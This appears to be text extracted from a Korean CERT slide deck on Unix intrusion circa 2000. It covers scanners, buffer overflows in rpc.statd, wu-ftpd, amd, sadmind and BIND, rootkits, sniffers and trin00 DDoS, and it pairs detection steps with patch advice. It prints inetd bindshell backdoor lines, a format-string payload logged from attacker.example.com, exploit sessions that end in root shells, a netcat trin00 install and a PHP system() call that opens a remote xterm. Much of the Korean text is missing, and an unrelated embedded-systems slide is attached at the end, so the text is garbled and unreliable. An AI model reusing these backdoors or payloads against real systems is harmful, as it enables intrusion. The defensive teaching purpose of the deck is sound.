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3 & Automated scan & attack / Internet Worm Ramen ADMWorm Millenium Internet Worm etc.

4 & multiple scan mscan, sscan, nmap,vetescan, sscanew,... Intruder Master Master Master / D D D D D D D D DDOS Trinoo, TFN, TFN2K, Stacheldraht, mstream,... Randomized ports Victim

5 (?) Windows Trojan BackOrifice, NetBus, Sub7, School Bus,DeepBO,...

6 Hackvisit

7 (Browers) Trojan(BO) GUI Trojan Horse (NNTP) DNS

8 1/2 <1 >,, <2 > ftpd, amountd, imap guest, anonymous,, ID <3 >root root root <4 > (Sniffer) ID,

9 2/2 <5 > (Backdoor), /etc/inetd.conf root login Trojaned telnet *KAIST <6 >,,,, <7 > < >

10 Types of Scan mscan SAINT, sscan2k, vetescan, Cgican, winscan, rpcscan : nmap, stealthscan : firewalk, nmap

11 network cert# nmap -sp *" Starting nmap V. 2.3BETA6 by Fyodor Host ( ) appears to be up. Host XXXXX.certcc.or.kr ( xxx) appears to be up. Host XXXXX.certcc.or.kr ( XXX) appears to be up. ( ) Host XXXXX.certcc.or.kr ( xxx) appears to be up. Host ( ) appears to be up. Host ( ) seems to be a subnet broadcast address (returned 26 extra pings). Skipping host. Nmap run completed IP addresses (27 hosts up) scanned in 14 seconds cert#

12 - nmap cert# nmap -I -O XXX Starting nmap V. 2.3BETA6 by Fyodor Interesting ports on XXX.certcc.or.kr ( XXX): Port State Protocol Service Owner 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 80 open tcp http 110 open tcp pop open tcp sunrpc 512 open tcp exec 1998 open tcp x25-svc-port 4045 open tcp lockd 6000 open tcp X open tcp dtspc 7100 open tcp font-service TCP Sequence Prediction: Class=random positive increments Difficulty=28995 (Worthy challenge) Remote operating system guess: Solaris Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds

13 - sscan2k sscan2k-pre6]#./sscan -o <[ * report for host violet93 * <[ tcp port: 111 (unknown) ]> <[ tcp port: 6000 (unknown) ]> <[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]> <[ tcp port: 21 (ftp) ]> <[ tcp port: 113 (auth) ]> --<[ *OS*: violet93: NMAP detected: Linux <[ *Named* Running: REL --<[ *BANNER*: Mail banner follows: 220 localhost.localdomain ESMTP Sendmail /8.11.0; Wed, 7 Feb :05: <[ * rpc services? * ]>-- <[ [prog. name -> portmapper] [port -> 111(udp)] [vers. -> 2] <[ [prog. name -> nlockmgr] [port -> 1056(udp)] [vers. -> 1] <[ [prog. name -> nlockmgr] [port -> 1056(udp)] [vers. -> 3] <[ [prog. name -> status] [port -> 1057(udp)] [vers. -> 1] <[ [prog. name -> status] [port -> 3196(tcp)] [vers. -> 1] --<[ * exports...? * ]>-- --<[ *VULN REPORT SUMMARY: violet93 --<[ *VULN*: violet93: sendmail will 'expn' accounts for us@? <[ * scan of violet93 completed

14 - vetescan vetes]#./vetescan [VetesCan]: checking for all the bitches arguments.. right on [VetesCan]: setting local script variables.. done. [VetesCan]: using nmap to detect running tcp services.. done. [VetesCan]: Lets see what OS the bitch has.. done. Done... [VetesCan]: checking for Vulnerable Services.. [VetesCan]: checking for Systat.. [VetesCan]: checking for Netstat.. [VetesCan]: checking for Authentication.. [VetesCan]: checking for ftpd.. [VetesCan]: checking for MDBMS.. [VetesCan]: checking for TCP/36864 portshell.. [VetesCan]: checking for gnapster.. [VetesCan]: checking for gdm.. [VetesCan]: checking for exec.. [VetesCan]: checking for D-Link Admin Login.. [VetesCan]: checking for Smb =-=-=-=-=-=-=-=-=V=e=t=e=S=c=a=n=-=-=-=-=-=-=-=-=-=-= Running services on : Starting nmap V. 2.3BETA15 by ( ) Interesting ports on violet93 ( ): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 53 open tcp domain 111 open tcp sunrpc 113 open tcp auth 515 open tcp printer 6000 open tcp X11 TCP Sequence Prediction: Class=random positive increments Difficulty= (Good luck!) Remote operating system guess: Linux Checking for Ftpd: [ver (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.] Vulnerable Ftpds: docs/ftp/vuln-ftp-versions.txt checking for RPC/Statd: statd Patch: ftp://sgigate.sgi.com/patches/ Exploit: docs/statd

15 [ ] Login Name TTY Idle When Where root Super-User console 3:20 Tue 10:30 :0 chief Ha do yoon pts/5 5:38 Wed 13: cert# rpcinfo -p xxx program vers proto port tcp 111 rpcbind udp 111 rpcbind ( ) udp 1026 nlockmgr udp 1026 nlockmgr tcp 1024 nlockmgr tcp 1024 nlockmgr tcp 878 amd udp 879 amd

16 root local attack : easy remote attack : not easy rpc.statd ftpd amd sadmin named

17 Buffer Overflow copy stack return address root

18 0xbfffffb 0xbfffffb 0xbfffffb Botton of stack env.vars parameters Botton of stack env.vars parameters Botton of stack env.vars parameters stack grown buffer grown Return addr Prev.frame ptr Stack vars Stack frame 0 Return addr Prev.frame ptr Stack vars Expected location of the return addr Return addr Prev.frame ptr Stack vars frame pointer stack pointer. parameters Return addr Prev.frame ptr Buffer[96] Stack frame for main() frame pointer stack pointer. addr of the attack code Attack code Attack code Buffer overflow stack pointer Instruction pointer stack address space stack address space stack address space. addr of the attack code Attack code Attack code void void main() main() { { char char buffer[96]; Instruction buffer[96];.. pointer.. Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } Instruction pointer void void main() main() { { char char buffer[96]; buffer[96];.... Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } void void main() main() { { char char buffer[96]; buffer[96];.... Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } executed code segment executed code segment executed code segment (a) before the attack (b) after injecting the attack code (c) execting the attack code

19 Buffer Overflow SUID

20 rpc.statd bug 1. syslog() string input ---> root - rpc.statd UNIX /etc/inetd.conf shell NFS rpc.statd - CERTCC-KR KA

21 FTPD bug 1. "Site exec" Vulnerability - wu-ftpd ftpd 2. setproctitle() Vulnerability - wu-ftpd 2.6.0, proftpd, OpenBSD (solaris ) Jul 4 17:43:25 victim ftpd[3408]: USER ftp Jul 4 17:43:25 victim ftpd[3408]: PASS [malicious shellcode] Jul 4 17:43:26 victim ftpd[3408]: ANONYMOUS FTP LOGIN FROM attacker.example.com [ ], [malicious shellcode] Jul 4 17:43:28 victim-site ftpd[3408]: SITE EXEC (lines: 0): %.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f %p Jul 4 17:43:28 victim ftpd[3408]: FTP session closed 3.

22 Linux amd Buffer Overflow amd - - am-utils amd - RedHat 6.x - - RedHat 6.x - amd

23 Linux amd Buffer Overflow [/tmp]# grep amd /var/log/messages messages.1:mar 11 05:20:50 xxx 27>Mar 11 05:20:50 amd[468]: amq requested mount of ^N 3 F^L ^W ^Z?K? 18 Jan str/bin/sh(-c)/bin/echo '2222? stream tcp nowait root /bin/sh s (^ [/tmp]# ls -l -rw-rw-rw- 1 root root 116 Mar 11 05:20 h [/tmp]# more h 2222 stream tcp nowait root /bin/sh sh -i

24 Linux amd Buffer Overflow [/tmp]# ps aux grep inetd root ? S Jan12 0:00 inetd root ? S Mar11 0:00 inetd -s /tmp/h [root@alzza6 ~]# netstat -a grep 2222 tcp 0 0 *:2222 *:* LISTEN

25 Linux amd Buffer Overflow $ telnet xxx.xxx.xxx.xxx 2222 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. bash# id id uid=0(root) gid=0(root) groups=0(root) bash#

26 Linux amd Buffer Overflow - 1- Intel: ftp://updates.redhat.com/6.0/i386/am-utils-6.0.1s i386.rpm Alpha: ftp://updates.redhat.com/6.0/alpha/am-utils-6.0.1s alpha.rpm SPARC: ftp://updates.redhat.com/6.0/sparc/am-utils-6.0.1s sparc.rpm Source: ftp://updates.redhat.com/6.0/srpms/am-utils-6.0.1s src.rpm Architecture neutral: ftp://updates.redhat.com/6.0/noarch/ # rpm -Uvh " # /etc/rc.d/init.d/amd restart

27 Linux amd Buffer Overflow - 2- amd # ps ax grep amd 444? S 0:00 /usr/sbin/amd -a /.automount -l syslog -c 1000 /net # killall -9 amd

28 Linux amd Buffer Overflow - 2- amd run level # chkconfig --list amd amd 0:off 1:off 2:off 3:on 4:on 5:on 6:off # chkconfig --level amd off # chkconfig --list amd amd 0:off 1:off 2:off 3:off 4:off 5:off 6:off

29 sadmind Buffer Overflow Sadmind - Solaris :Sun Solstice Adminsuite - Solaris 2.5, 2.6, 2.7 /usr/sbin - remote - request, inetd daemon

30 sadmind Buffer Overflow Sadmind - sadmind stack - sadmind root - remote root - offset ~

31 sadmind Buffer Overflow cert# sadmindex -h s [offset] %sp 0xefff9580 offset > return address 0xefff9838 [4] %sp 0xefff9580 with frame length > %fp 0xefffa850 clnt_call: RPC: Timed out now check if exploit worked; RPC failure was expected cert# telnet Trying Connected to Escape character is '^]'. # id; uid=0(root) gid=0(root)

32 sadmind Buffer Overflow ( ) # ls -al /tmp/bob -rw-rw-rw- 1 root root 48 Jun 7 15:34 /tmp/bob # cat /tmp/bob ingreslock stream tcp nowait root /bin/sh sh -i # ps -ef. root :19:07? 0:00 /usr/sbin/inetd -s /tmp/bob. # netstat -a Local Address Remote Address Swind Send-Q Rwind Recv-Q State *.ingreslock *.* LISTEN

33 sadmind Buffer Overflow /var/adm/messages Apr 12 06:43:34 xxxx inetd[138]: /usr/sbin/sadmind: Bus Error - core dumped Apr 12 06:43:36 xxxx inetd[138]: /usr/sbin/sadmind: Segmentation Fault - core dumped Apr 12 06:43:39 xxxx inetd[138]: /usr/sbin/sadmind: Bus Error - core dumped Apr 12 06:43:41 xxxx inetd[138]: /usr/sbin/sadmind: Segmentation Fault - core dumped Apr 12 06:43:44 xxxx inetd[138]: /usr/sbin/sadmind: Hangup

34 sadmind Buffer Overflow /etc/inetd.conf, ( # ) /10 tli rpc/udp wait root /usr/sbin/sadmind sadmind sadmind ( : /opt/sunwadm/bin/admuseradd ) /10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2

35 sadmind Buffer Overflow - OS Version Patch ID SunOS SunOS 5.7_x SunOS SunOS 5.6_x SunOS SunOS 5.5.1_x SunOS SunOS 5.5_x AdminSuite Version Patch ID (see Note) 2.3_x (see Note)

36 DNS : named, : resolver TCP, UDP port 53 port - DNS

37 DNS - - Inverse Query - inverse query request - root - BIND 8(/etc/named.conf ) fake-iquery no; - BIND 4.9(/etc/named.boot ) options fake-iquery, conf/options.h INVQ

38 DNS - - Inverse Query /var/named/admrocks empty /etc/inetd.conf 2222 port back door 2222 stream tcp nowait root /bin/sh sh -i

39 NXT NXT Regular Record DNS - - owner name zone name zone signed

40 NXT DNS BIND 8.2, 8.2 p1, NXT validate - NXT - buffer overflow code - named - BIND BIND 4.x

41 NXT DNS - - ADM named 8.2/8.2.1 NXT remote overflow exploit 1999 exploit root /tmp/bob ingreslock stream tcp nowait root /bin/sh sh -i /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob /var/named/admrocks empty directory / var/named/o

42 DNS DNS off /etc/rc.d/init.d/named stop chmod -x /etc/rc.d/init.d/named bind - bind 4.9.7, p5 - : Solaris 7 Solaris 7 (SPARC) Solaris 7 (Intel) RedHat Linux 6.x ( )

43 Back door / backdoor 1. bindshell - daemon shell 2. inetd - trojan remote access 3. tcpd - hide connection, avoid deny 4. Rshd - trojan remote access 5. chfn, chsh - user root 6. crontab - cron 7. du - hide file size 8. find - hide file 9. ls - hide file 10. ifconfig - hide sniffing (hide promiscuous mode interface)

44 Back door / backdoor 11. killall - kill 12. sniffer - packet sniffer 13. sniffchk - sniffer 14. login - trojan remote access 15. netstat - hide connection, hide listening port 16. passwd - user root 17. pidof - hide process (linux) 18. ps - sniffer, backdoor daemon 19. wted - wtmp / utmp 20. syslogd - hide log 21. top - sniffer, backdoor daemon

45 Back door bindshell /08/12 3.2/4.3NFSSRC # Internet server configuration database ftp stream tcp nowait root /usr/etc/ftpd ftpd telnet stream tcp nowait root /usr/etc/telnetd telnetd shell stream tcp nowait root /usr/etc/rshd rshd 2222 stream tcp nowait root /bin/sh sh -i

46 shell backdoor scan scanning 3. tcp 1524, 2222, 9704 scan scanner#./synscan infile outfile eth ,2222,9704 SynScan 1.6 by psychoid/tcl scanner# cat outfile 203.*** (203.*** ):1524 :# 202.*** (202.***.78.98):1524 :bash# 202.*** (202.***.13.81):2222 :bash# cf PC outfile.

47 Rootkit,, backdoor Rootkit /dev. (ls ls ). (ex. /usr/src/linux/arch/alpha/lib) find /dev -type f -print

48 Rootkit rootkit lrk 4,5 warchild rootkit (solaris, linux),knork Rootkit. (ex. ac.kr scanning) scanning Denial of service..

49 Sniffing ID telnet, pop, www ID esniff, solsniff, linsniff, sniffit, tcpdump, snoop, WWW Sniff

50 Sniffing promiscuous mode : sniffing. :CPM, neped Secure Shell (SSH), VPN tcp session.


52 Event Attack Incident : Hackers, Spies, Terrorists, Corporate raider, Professional Criminals, Vandals, Voyeurs : Physical Attack, Information Exchange, User command, Script/Program, Autonomous agent, Toolkit, Distributed tool, Data trap : Design, Implementation, Configuration : Probe, Scan, Flood, Authenticate, Bypass, Spoof, Read, Copy, Steal, Modify, Delete : Account, Process, Data, Component, Computer, Network, Internet work : Increased Access, Disclosure of Information, Corruption of Information, Denial of Service, Theft of Resources : Challenge Status/Thrill, Political Gain, Financial Gain, Damage

53 (Denial Of Service) TCP DOS DOS

54 Distributed DOS Attack Trin00 Attack 27665/tcp Intruder M-> D : 27444/udp D->M : 31335/udp Master Master Master D D D D D D D D Randomized ports Victim

55 Trin00 Attack Communication Network Master Daemon Agent Daemon Hello telnet xxx.xxx.xxx. xxx password trinoo > Trinoo > attack IP- Addr password attack IP- addr Broadcast PONG Attack (UDP Flooding)

56 Stacheldraht Attack Communication Network 65000/tcp or ICMP ECHO_REPLY ICMP ECHO_REPLY agent 16660/tcp ( ) master TCP SYN, UDP flood ICMP flood, Smurf Internet Attacker master handler client

57 Distributed DOS Attack Trin00 ( ) : Trin00 rpc./trin.sh nc xxx.xxx.xxx.xxx 1524 WORM trin00

58 Distributed DOS Attack Trin00 trin00 master Deamon # nmap -PI -st -p m 2766.log xxx.xxx.xxx # nmap -PI -su -p m log xxx.xxx.xxx # nmap -PI -su -p m log xxx.xxx.xxx rpc # nmap -PI -st -p m 1524.log xxx.xxx.xxx ) Host: xxx.xxx.xxx.21 () Status: Up Host: xxx.xxx.xxx.22 () Ports: 31335/open/udp///// Host: xxx.xxx.xxx.28 () Ports: 31335/open/udp///// Host: xxx.xxx.xxx.29 () Ports: 31335/open/udp/////

59 Distributed DOS Attack Trin00 : trin00 : tserver1900, deamon : tsolnmb, ns, httpd, rpc.trinoo, rpc.listen, trinix, rpc.irix, irix cron table * * * * /dev/isdn/.subsys/tsolnmb > /dev/null 2>&1 netstat *:31335 Idle (UDP) *:27444 Idle (UDP) *:27665 *:*... Listen (TCP)

60 Distributed DOS Attack Trin00 Secure Your Host 31335(UDP), 27444(UDP), 27665(TCP) DOS Trin00 National Infrastructure Protection Center Trin00 CERTCC-KR,

61 Distributed DOS Attack Trin00 daemon strings master master CERTCC-KR daemon binary master master daemon IP CERTCC-KR CERTCC-KR daemon host trin00 CERTCC-KR

62 Distributed DOS Attack Trin00 CERTCC-KR Trin00 ISP Trin00? Trin00 /

63 PHP 1. / php <? system( "/usr/bin/x11/xterm -display < IP>:0.0" );?> 4. PHP CGI.php.php3.cgi SSI( Server Side Interpreter ) --> nobody

64 PHP 5. - PHP, - -,.php.php3 cgi - CERTCC-KR KA

65 - -

66 - -

67 - -

68 - - /usr/sbin/pwconv, pwunconv crack passwd+, npasswd, anlpasswd -n : -x : -w : /etc/default/passwd PASSLENGTH

69 - - Linux Red Hat : SUNOS : show.pl?target=patches/patch-access HPUX : IBM AIX : ftp://aix.software.ibm.com/aix/efixes/security/ NOVELL : ftp://ftp.novell.com SCO : ftp://ftp.sco.com SGI : ftp://ftp.sgi.com/security/sgi

70 - - UNIX Utmp Acces s_log mess ages News log Su log Secur e log wtmp SPAM relay Popd O O Spool er log Sys log Imapd O O Named O Innd O O Identd O Phf CGI O Portscan Mscan O O O su O O login O O O O ftp O O O O O

71 Q & A

PowerPoint ํ”„๋ ˆ์  ํ…Œ์ด์…˜

PowerPoint ํ”„๋ ˆ์  ํ…Œ์ด์…˜ (Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet

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